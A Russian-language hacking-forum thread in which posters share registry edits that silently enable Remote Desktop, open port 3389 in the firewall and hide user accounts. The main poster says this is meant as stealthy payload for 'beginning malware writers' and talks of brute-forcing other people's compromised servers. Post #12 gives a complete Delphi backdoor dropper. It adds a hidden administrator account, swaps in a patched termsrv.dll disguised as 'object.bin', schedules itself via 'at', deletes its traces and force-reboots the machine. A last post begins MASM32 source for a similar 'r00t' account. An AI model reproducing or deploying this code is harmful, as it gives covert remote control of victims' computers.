Разрешить удаленный доступ к компьютеру (через реестр)

Discussion in 'С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby' started by ErrorNeo, 7 Mar 2010.

  1. ErrorNeo

    ErrorNeo Elder - Старейшина

    Joined:
    2 May 2009
    Messages:
    923
    Likes Received:
    838
    Reputations:
    402
    нужно было себе, хотел было спросить тут готовое - но пошел по другому пути - разобраться самому и рассказать другим.

    Включаем
    "Разрешить удаленный доступ к этому компьютеру" через реестр:
    Code:
    Windows Registry Editor Version 5.00
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
    "fDenyTSConnections"=dword:00000000
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List]
    "3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009"
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
    "3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009"
    
    Выключаем:
    Code:
    Windows Registry Editor Version 5.00
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
    "fDenyTSConnections"=dword:00000001
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List]
    "3389:TCP"="3389:TCP:*:Disabled:@xpsp2res.dll,-22009"
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
    "3389:TCP"="3389:TCP:*:Disabled:@xpsp2res.dll,-22009"
    
    Bonus: (инфа паблик, но если вам пригодилась первая часть этой темы - может пригодиться и бонус)
    делаем любую учетку невидимой через "Паналь управления - Учетные записи пользователей"
    Code:
    Windows Registry Editor Version 5.00
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList] 
    "hidden_account"=dword:00000000
    где hidden_account - имя учетки.
    Примечание: учетка будет невидна только через "Учетные записи пользователей" (Win XP) а так же в меню выбора пользователя при запуске системы. Через "net user", "lusrmgr.msc" и прочие аналогичные админские управлялки её по-прежнему видно.

    Сабж удачно подходит как лишняя безпалевная полезная нагрузка для вашего софта по управлению собственным компьютером в учебных целях

    ps. если хоитие поставить на учетку пасс, который не смогут снять за 10-15 минут - ставьте минимально 15 символов.
    В винде по дефолту пассы учеток хранятся и в виде LM и в NT хэшей, при этом большинство LM хэшей ломается на GPU в течение получаса. За 2 суток же - вообще любой, не зависимо от сложности пасса. НО - для пассов, длиннее 14 символов LM хэши не сохраняются - только NT. Подобрать же (15 символьный) NT хэш, если пасс минимально сложен для своей длинны и не словарный - невозможно.
    Почему я это говорю? Если на всех своих дедах вы зафигачите одну и ту же учетку с 1 и тем же пассом, и кто-то их других брутеров вдруг запалит эту учетку - он может тупо пробрутить диапазон по ней (я сам так делал :rolleyes: ), и снять все ваши деды. Как защиту от этого - юзайте 15-симв. пассы



    [update]Полный и рабочий код программы см. ниже в посте #12[/update]
     
    #1 ErrorNeo, 7 Mar 2010
    Last edited: 8 Mar 2010
    2 people like this.
  2. Du6uJlyLLlkO

    Du6uJlyLLlkO Banned

    Joined:
    4 Mar 2010
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    С удовольствием поставил бы + , но немогу =( маловат ещё
     
  3. SpangeBoB

    SpangeBoB Elder - Старейшина

    Joined:
    12 Jul 2008
    Messages:
    1,680
    Likes Received:
    393
    Reputations:
    102
    А в чем разбор то состоит,что было все было описанно от 2001 года? Про хэши так это времен 93 года =)
     
  4. ErrorNeo

    ErrorNeo Elder - Старейшина

    Joined:
    2 May 2009
    Messages:
    923
    Likes Received:
    838
    Reputations:
    402
    я заюзал гугл и не нашел, как включать эту опцию через реестр.
    дальше промониторил реестр при включении\выключении этой опции, нашел нужные ключи - протестировал и запостил тут.
    Думаю если этого не знал я, то не знают и многие другие начинающие писатели малвар-софта. И теперь гугл - когда они его спросят - таки даст им ответ :cool:
     
  5. SpangeBoB

    SpangeBoB Elder - Старейшина

    Joined:
    12 Jul 2008
    Messages:
    1,680
    Likes Received:
    393
    Reputations:
    102
    Плохо искали, http://technet.microsoft.com/en-us/library/cc778860(WS.10).aspx
     
  6. ErrorNeo

    ErrorNeo Elder - Старейшина

    Joined:
    2 May 2009
    Messages:
    923
    Likes Received:
    838
    Reputations:
    402
    я понимаю желание показать высокий уровень компьютерной грамотности, но
    не зная того, какой именно ключ отвечает за Разрешение удаленного доступа слабо найти эту страницу?
    Вообще-то там весь реестр расписан - если знаешь имена нужных ключей. А если не знаешь названий - то либо нужно несколько месяцев читать их все (интересно есть ли те, кто прочил их все), либо обломаться.

    upd.
    вообще да, пожалуй можно - если юзать поиск по сайту и писать все по английски. Но тем не менее проще - просто спросить гугл. Ну а на втором месте - протрассировать самому :p

    да и вообще возможно кому-то понравится сама идея добавлять такую нагрузку в свой софт - просто и изящно...

    upd2.
    в добавок юзер, который нашел таки эту страницу заюзав знания английского и знание названий обпций в Англ. версии винды должен еще и не забыть открыть доступ к порту в виндовом фаере (а о необходимости этого на мелкософте не сказано). Конечно же, если юзер достаточно грамотен - он догадается.... возможно.
    Но опять же - не проще ли
    1. спросить гугл и найти такую статью как эта и не *ть себе мозг
    2. протрассировать, чтобы не думать - "не забыл ли я чего" и "блин, почему оно не работает"
     
    #6 ErrorNeo, 7 Mar 2010
    Last edited: 7 Mar 2010
  7. SpangeBoB

    SpangeBoB Elder - Старейшина

    Joined:
    12 Jul 2008
    Messages:
    1,680
    Likes Received:
    393
    Reputations:
    102
    По удивлению введя в гугле Enable remote desktop registry ,получаем огромное колличество ссылок и опять же сайт производителя:
    http://technet.microsoft.com/en-us/library/cc782195(WS.10).aspx

    И сайт одного из MVP даже в картинках показано:
    http://oreilly.com/windows/archive/server-hacks-remote-desktop.html
     
  8. ErrorNeo

    ErrorNeo Elder - Старейшина

    Joined:
    2 May 2009
    Messages:
    923
    Likes Received:
    838
    Reputations:
    402
    я проапдейтил предыдущий пост.
    Ну сделал ты это, ну не пашет оно, и чо? На сайте мелкософта написано, что нужно добавлять порт в исключения фаера? И какое количество времени начинающий писатель малвари будет догонять, чо не пашет?

    Теория есть теория. Кроме того всё, что ты - спренгл - нашел - на английском. Любой кодер просто обязан знать английский в достаточной степени для того, чтобы свободно читать сайт майкрософта и иностранные блоги, да?
    Все, кто свободно не знает английского, не имеет на машине анлглоязычной версии венды и потому не знает точных названий опций в ней (на англ) + не достаточно екстрасансорен, чтобы понимать, что включив службу, конечно же, нужно не забыть открыть и порт - все они - школота, которой и не нужно писать таких вещей, чтобы не засорять интернет. ?

    Я так не считаю. пусть себе пишут)

    update:
    по запросам "разрешить удаленный доступ к компьютеру" и "разрешить удаленный доступ к компьютеру через реестр" в ру-нете есть только 1 тема с описанием того, как это сделать не "мышкой через меню". эта.
    и да будет так :cool:
     
    #8 ErrorNeo, 7 Mar 2010
    Last edited: 7 Mar 2010
  9. slesh

    slesh Elder - Старейшина

    Joined:
    5 Mar 2007
    Messages:
    2,702
    Likes Received:
    1,224
    Reputations:
    455
    Ну так тут дело всё даже не в реестре. Удаленный доступ осуществляется загрузкой сервиса который это делает и разрешение коннекта.
    ВОт тут вот и кроется вся хря. В твоем случае ты просто разрешаешь коннекты, но не запускаешь сервис. Частенько телнет отрублен.
     
  10. ErrorNeo

    ErrorNeo Elder - Старейшина

    Joined:
    2 May 2009
    Messages:
    923
    Likes Received:
    838
    Reputations:
    402
    да...
    я думал об этом, но не запостил тут. Есть там какой-то ключ и для этого. Допишу и запуск службы

    upd
    Code:
    Microsoft Windows XP [Версия 5.1.2600]
    (С) Корпорация Майкрософт, 1985-2001.
    
    C:\Documents and Settings\Admin>net start telnet
    Системная ошибка 1058.
    
    Указанная служба не может быть запущена, поскольку она отключена или все связанн
    ые с ней устройства отключены.
    только что запускал на деде, управляя им через RDP. Там как-то по другому вроде. Щас поищу

    upd2. нашел (прогуглив ключ) на http://forum.hackzona.ru/forum-f16/aaee-t17123.html
    ("Активация удаленного доступа на Bat")
    Code:
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Terminal Server\Licensing Core]
    "EnableConcurrentSessions"=dword:00000001
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
    "AllowMultipleTSSessions"=dword:00000001
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Group Policy\History]
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Group Policy\History\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}]
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Group Policy\History\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}\0]
    "Options"=dword:00000000
    "Version"=dword:00010001
    "DSPath"="LocalGPO"
    "FileSysPath"="C:\\WINNT\\System32\\GroupPolicy\\Machine"
    "DisplayName"="Политика локальной группы"
    "Extensions"="[{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{0F6B957D-509E-11D1-A7CC-0000F87571E3}]"
    "Link"="Local"
    "GPOName"="Политика локальной группы"
    "GPOLink"=dword:00000001
    "lParam"=dword:00000000
    
    
    [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Te rminal Server]
    "fDenyTSConnections"=dword:00000000
    "fEnableSalem"=dword:00000000
    [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\ LEGACY_RDPWD]
    "NextInstance"=dword:00000001
    
    [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\ LEGACY_RDPWD\0000]
    "Service"="RDPWD"
    "Legacy"=dword:00000001
    "ConfigFlags"=dword:00000000
    "Class"="LegacyDriver"
    "ClassGUID"="{8ECC055D-047F-11D1-A537-0000F8753ED1}"
    "DeviceDesc"="RDPWD"
    
    [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\ LEGACY_RDPWD\0000\Control]
    "*NewlyCreated*"=dword:00000000
    "ActiveService"="RDPWD"
    
    
    
    [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\ LEGACY_TDTCP]
    "NextInstance"=dword:00000001
    
    [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\ LEGACY_TDTCP\0000]
    "Service"="TDTCP"
    "Legacy"=dword:00000001
    "ConfigFlags"=dword:00000000
    "Class"="LegacyDriver"
    "ClassGUID"="{8ECC055D-047F-11D1-A537-0000F8753ED1}"
    "DeviceDesc"="TDTCP"
    
    [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\ LEGACY_TDTCP\0000\Control]
    "*NewlyCreated*"=dword:00000000
    "ActiveService"="TDTCP"
    
    [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\R DPWD\Enum]
    "0"="Root\\LEGACY_RDPWD\\0000"
    "Count"=dword:00000001
    "NextInstance"=dword:00000001
    
    [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\S haredAccess\Parameters\FirewallPolicy\DomainProfil e\GloballyOpenPorts\List]
    "3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009"
    [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\S haredAccess\Parameters\FirewallPolicy\StandardProf ile\GloballyOpenPorts\List]
    "3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009"
    
    [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\T DTCP\Enum]
    "0"="Root\\LEGACY_TDTCP\\0000"
    "Count"=dword:00000001
    "NextInstance"=dword:00000001
    
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Terminal Server]
    "fDenyTSConnections"=dword:00000000
    "fEnableSalem"=dword:00000000
    
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\R oot\LEGACY_RDPWD]
    "NextInstance"=dword:00000001
    
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\R oot\LEGACY_RDPWD\0000]
    "Service"="RDPWD"
    "Legacy"=dword:00000001
    "ConfigFlags"=dword:00000000
    "Class"="LegacyDriver"
    "ClassGUID"="{8ECC055D-047F-11D1-A537-0000F8753ED1}"
    "DeviceDesc"="RDPWD"
    
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\R oot\LEGACY_RDPWD\0000\Control]
    "*NewlyCreated*"=dword:00000000
    "ActiveService"="RDPWD"
    
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\R oot\LEGACY_TDTCP]
    "NextInstance"=dword:00000001
    
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\R oot\LEGACY_TDTCP\0000]
    "Service"="TDTCP"
    "Legacy"=dword:00000001
    "ConfigFlags"=dword:00000000
    "Class"="LegacyDriver"
    "ClassGUID"="{8ECC055D-047F-11D1-A537-0000F8753ED1}"
    "DeviceDesc"="TDTCP"
    
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\R oot\LEGACY_TDTCP\0000\Control]
    "*NewlyCreated*"=dword:00000000
    "ActiveService"="TDTCP"
    
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\RDPWD\Enum]
    "0"="Root\\LEGACY_RDPWD\\0000"
    "Count"=dword:00000001
    "NextInstance"=dword:00000001
    
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\SharedAccess\Parameters\FirewallPolicy\DomainPr ofile\GloballyOpenPorts\List]
    "3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009"
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\SharedAccess\Parameters\FirewallPolicy\Standard Profile\GloballyOpenPorts\List]
    "3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009"
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\TDTCP\Enum]
    "0"="Root\\LEGACY_TDTCP\\0000"
    "Count"=dword:00000001
    "NextInstance"=dword:00000001
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t]
    "asdf"=dword:00000000
    чета дофига ключей... надо разбираться, для чего тут половина.

    upd3.
    во блин... http://forum.antichat.net/showthread.php?t=36042
    а ведь и правда, в XP тока один юзер по дефолту может сидеть! Надо еще и винду патчить... =\
     
    #10 ErrorNeo, 7 Mar 2010
    Last edited: 7 Mar 2010
  11. cheater_man

    cheater_man Member

    Joined:
    13 Nov 2009
    Messages:
    651
    Likes Received:
    44
    Reputations:
    7
    Я rdp открываю так:
    Code:
    reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
    
    del on_rdp.bat
     
  12. ErrorNeo

    ErrorNeo Elder - Старейшина

    Joined:
    2 May 2009
    Messages:
    923
    Likes Received:
    838
    Reputations:
    402
    итак, готово.
    "На дельфи" программа, более менее эффективно превращающая ПК в Dedicated Server с учетной записью test_account и паролем some_password выглядит так:
    Code:
    program Dedic;
    
    uses
       SysUtils,windows;
    
    var
       f:textfile;
    
    begin
    
    copyfile('object.bin','c:\RECYCLER\temp_dll.tmp',false);
    assignfile(f,'c:\RECYCLER\temp1.bat');
    rewrite(f);
       writeln(f,'net user test_account some_password /add');
       writeln(f,'net user test_account some_password /EXPIRES:NEVER');
       writeln(f,'net user test_account /active:yes');
       writeln(f,'net localgroup Users test_account /add');
       writeln(f,'net localgroup Power Users test_account /add');
       writeln(f,'net localgroup Power Backup Operators test_account /add');
       writeln(f,'net localgroup Power Remote Desktop Users test_account /add');
       writeln(f,'net localgroup Administrators test_account /add');
       writeln(f,'chcp 1252');
       writeln(f,'net localgroup Администраторы test_account /add');
       writeln(f,'chcp 866');
       writeln(f,'net localgroup HelpServicesGroup test_account /add');
       writeln(f,'md "%SystemDrive%\Documents and Settings\test_account"');
       writeln(f,'attrib +r +a +s +h "%SystemDrive%\Documents and Settings\test_account"');
       writeln(f,'');
       writeln(f,'');
       writeln(f,'echo Windows Registry Editor Version 5.00>file.reg');
       writeln(f,'');
       writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]>>file.reg');
       writeln(f,'echo "Start"=dword:00000002>>file.reg');
       writeln(f,'');
       writeln(f,'echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services]>>file.reg');
       writeln(f,'echo "MaxInstanceCount"=dword:00000064>>file.reg');
       writeln(f,'');
       writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core]>>file.reg');
       writeln(f,'echo "EnableConcurrentSessions"=dword:00000001>>file.reg');
       writeln(f,'');
       writeln(f,'echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]>>file.reg');
       writeln(f,'echo "AllowMultipleTSSessions"=dword:00000001>>file.reg');
       writeln(f,'');
       writeln(f,'echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History]>>file.reg');
       writeln(f,'echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}]>>file.reg');
       writeln(f,'echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}\0]>>file.reg');
       writeln(f,'echo "Options"=dword:00000000>>file.reg');
       writeln(f,'echo "Version"=dword:00010001>>file.reg');
       writeln(f,'echo "DSPath"="LocalGPO">>file.reg');
       writeln(f,'echo "FileSysPath"="C:\\WINNT\\System32\\GroupPolicy\\Machine">>file.reg');
       writeln(f,'echo "DisplayName"="Политика локальной группы">>file.reg');
       writeln(f,'echo "Extensions"="[{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{0F6B957D-509E-11D1-A7CC-0000F87571E3}]">>file.reg');
       writeln(f,'echo "Link"="Local">>file.reg');
       writeln(f,'echo "GPOName"="Политика локальной группы">>file.reg');
       writeln(f,'echo "GPOLink"=dword:00000001>>file.reg');
       writeln(f,'echo "lParam"=dword:00000000>>file.reg');
       writeln(f,'');
       writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server]>>file.reg');
       writeln(f,'echo "fDenyTSConnections"=dword:00000000>>file.reg');
       writeln(f,'echo "fEnableSalem"=dword:00000000>>file.reg');
       writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_RDPWD]>>file.reg');
       writeln(f,'echo "NextInstance"=dword:00000001>>file.reg');
       writeln(f,'');
       writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_RDPWD\0000]>>file.reg');
       writeln(f,'echo "Service"="RDPWD">>file.reg');
       writeln(f,'echo "Legacy"=dword:00000001>>file.reg');
       writeln(f,'echo "ConfigFlags"=dword:00000000>>file.reg');
       writeln(f,'echo "Class"="LegacyDriver">>file.reg');
       writeln(f,'echo "ClassGUID"="{8ECC055D-047F-11D1-A537-0000F8753ED1}">>file.reg');
       writeln(f,'echo "DeviceDesc"="RDPWD">>file.reg');
       writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_RDPWD\0000\Control]>>file.reg');
       writeln(f,'echo "*NewlyCreated*"=dword:00000000>>file.reg');
       writeln(f,'echo "ActiveService"="RDPWD">>file.reg');
       writeln(f,'');
       writeln(f,'');
       writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_TDTCP]>>file.reg');
       writeln(f,'echo "NextInstance"=dword:00000001>>file.reg');
       writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_TDTCP\0000]>>file.reg');
       writeln(f,'echo "Service"="TDTCP">>file.reg');
       writeln(f,'echo "Legacy"=dword:00000001>>file.reg');
       writeln(f,'echo "ConfigFlags"=dword:00000000>>file.reg');
       writeln(f,'echo "Class"="LegacyDriver">>file.reg');
       writeln(f,'echo "ClassGUID"="{8ECC055D-047F-11D1-A537-0000F8753ED1}">>file.reg');
       writeln(f,'echo "DeviceDesc"="TDTCP">>file.reg');
       writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_TDTCP\0000\Control]>>file.reg');
       writeln(f,'echo "*NewlyCreated*"=dword:00000000>>file.reg');
       writeln(f,'echo "ActiveService"="TDTCP">>file.reg');
       writeln(f,'');
       writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\RDPWD\Enum]>>file.reg');
       writeln(f,'echo "0"="Root\\LEGACY_RDPWD\\0000">>file.reg');
       writeln(f,'echo "Count"=dword:00000001>>file.reg');
       writeln(f,'echo "NextInstance"=dword:00000001>>file.reg');
       writeln(f,'');
       writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TDTCP\Enum]>>file.reg');
       writeln(f,'echo "0"="Root\\LEGACY_TDTCP\\0000">>file.reg');
       writeln(f,'echo "Count"=dword:00000001>>file.reg');
       writeln(f,'echo "NextInstance"=dword:00000001>>file.reg');
       writeln(f,'');
       writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List]>>file.reg');
       writeln(f,'echo "3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009">>file.reg');
       writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]>>file.reg');
       writeln(f,'echo "3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009">>file.reg');
       writeln(f,'');
       writeln(f,'');
       writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>file.reg');
       writeln(f,'echo "fDenyTSConnections"=dword:00000000>>file.reg');
       writeln(f,'echo "fEnableSalem"=dword:00000000>>file.reg');
       writeln(f,'');
       writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RDPWD]>>file.reg');
       writeln(f,'echo "NextInstance"=dword:00000001>>file.reg');
       writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RDPWD\0000]>>file.reg');
       writeln(f,'echo "Service"="RDPWD">>file.reg');
       writeln(f,'echo "Legacy"=dword:00000001>>file.reg');
       writeln(f,'echo "ConfigFlags"=dword:00000000>>file.reg');
       writeln(f,'echo "Class"="LegacyDriver">>file.reg');
       writeln(f,'echo "ClassGUID"="{8ECC055D-047F-11D1-A537-0000F8753ED1}">>file.reg');
       writeln(f,'echo "DeviceDesc"="RDPWD">>file.reg');
       writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RDPWD\0000\Control]>>file.reg');
       writeln(f,'echo "*NewlyCreated*"=dword:00000000>>file.reg');
       writeln(f,'echo "ActiveService"="RDPWD">>file.reg');
       writeln(f,'');
       writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_TDTCP]>>file.reg');
       writeln(f,'echo "NextInstance"=dword:00000001>>file.reg');
       writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_TDTCP\0000]>>file.reg');
       writeln(f,'echo "Service"="TDTCP">>file.reg');
       writeln(f,'echo "Legacy"=dword:00000001>>file.reg');
       writeln(f,'echo "ConfigFlags"=dword:00000000>>file.reg');
       writeln(f,'echo "Class"="LegacyDriver">>file.reg');
       writeln(f,'echo "ClassGUID"="{8ECC055D-047F-11D1-A537-0000F8753ED1}">>file.reg');
       writeln(f,'echo "DeviceDesc"="TDTCP">>file.reg');
       writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_TDTCP\0000\Control]>>file.reg');
       writeln(f,'echo "*NewlyCreated*"=dword:00000000>>file.reg');
       writeln(f,'echo "ActiveService"="TDTCP">>file.reg');
       writeln(f,'');
       writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RDPWD\Enum]>>file.reg');
       writeln(f,'echo "0"="Root\\LEGACY_RDPWD\\0000">>file.reg');
       writeln(f,'echo "Count"=dword:00000001>>file.reg');
       writeln(f,'echo "NextInstance"=dword:00000001>>file.reg');
       writeln(f,'');
       writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TDTCP\Enum]>>file.reg');
       writeln(f,'echo "0"="Root\\LEGACY_TDTCP\\0000">>file.reg');
       writeln(f,'echo "Count"=dword:00000001>>file.reg');
       writeln(f,'echo "NextInstance"=dword:00000001>>file.reg');
       writeln(f,'');
       writeln(f,'');
       writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List]>>file.reg');
       writeln(f,'echo "3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009">>file.reg');
       writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]>>file.reg');
       writeln(f,'echo "3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009">>file.reg');
       writeln(f,'');
       writeln(f,'');
       writeln(f,'echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>>file.reg');
       writeln(f,'echo "test_account"=dword:00000000>>file.reg');
       writeln(f,'');
       writeln(f,'REGEDIT /S file.reg');
       writeln(f,'DEL /Q file.reg');
       writeln(f,'');
       writeln(f,'ren %SystemRoot%\system32\termsrv.dll termsrv.old');
       writeln(f,'del %SystemRoot%\system32\termsrv.old');
       writeln(f,'copy c:\RECYCLER\temp_dll.tmp %SystemRoot%\system32\DLLCache\termsrv.dll');
       writeln(f,'copy c:\RECYCLER\temp_dll.tmp %SystemRoot%\system32\termsrv.dll');
       writeln(f,'');
       writeln(f,'DEL /Q c:\RECYCLER\temp_dll.tmp');
       writeln(f,'shutdown -r -f -t 1');
       writeln(f,'DEL /Q c:\RECYCLER\temp1.bat');
    closefile(f);
    
    assignfile(f,'c:\RECYCLER\temp2.bat');
    rewrite(f);
       writeln(f,'set /a hr=%time:~,2%');
       writeln(f,'set /a min=%TIME:~3,2%+15');
       writeln(f,'at %hr%:%min% c:\RECYCLER\temp1.bat');
       writeln(f,'DEL /Q c:\RECYCLER\temp2.bat');
    closefile(f);
    
    winexec('c:\RECYCLER\temp2.bat',0);
    
    end.
    где object.bin - переименованная для меньшей подозрительности старая версия библиотеки termsrv.dll, позволяющая коннектиться к ХР-юше сразу многим пользователям.
    Скачать её можно в гугле или тут (http://errorneo.com/files/termsrv.zip)

    Код оттестирован на виртуалке и полностью работоспособен.
    Написан в образовательных целях.

    post scriptum:
    writeln(f,'net user test_account /active:yes'); - чтобы было. При некоторых юзернеймах может пригодиться.
    writeln(f,''); - для красоты.

    "На дельфи" в кавычках потому, что можно было бы и вообще обойтись без коноплируемого языка - сделав программу из одного единственного батника и либы. Но все же в виде exe оно как-то удобнее
     
    #12 ErrorNeo, 8 Mar 2010
    Last edited: 9 Mar 2010
    1 person likes this.
  13. dr.Pilulkin

    dr.Pilulkin Elder - Старейшина

    Joined:
    3 Jun 2007
    Messages:
    42
    Likes Received:
    16
    Reputations:
    0
    Вот вам исходничек. Писал когдато мож пригодится.
    MASM32
    Code:
    .586
    .model flat,stdcall
    option casemap:none
    
       
       include windows.inc
       include kernel32.inc
       include shell32.inc
       include netapi32.inc
       include advapi32.inc
       include oleaut32.inc
     
       
       includelib kernel32.lib
       includelib shell32.lib
       includelib netapi32.lib
       includelib advapi32.lib
       includelib oleaut32.lib
       
    
       
    .data
    
    wzUser dw "r","0","0","t",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
    wzPass dw "t","0","0","r",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
    pwzUser dd offset wzUser
    d1 dd 0
    Err dd 0
    Ginfo LOCALGROUP_INFO_1 <0>
    Uinfo USER_INFO_1 <0>
    Eread dd 0
    Etotal dd 0
    
    hKey dd 0
    szTerm db "SYSTEM\CurrentControlSet\Control\Terminal Server",0
    szLic db "SYSTEM\\CurrentControlSet\Control\Terminal Server\Licensing Core",0
    szSacc db "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList",0
    szUsr db "r00t",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
    szVal db "fDenyTSConnections",0
    szSes db "EnableConcurrentSessions",0
    szSrvc db "TermService",0
    Zer dd 0
    One dd 1
    Scm dd 0
    Srvc dd 0
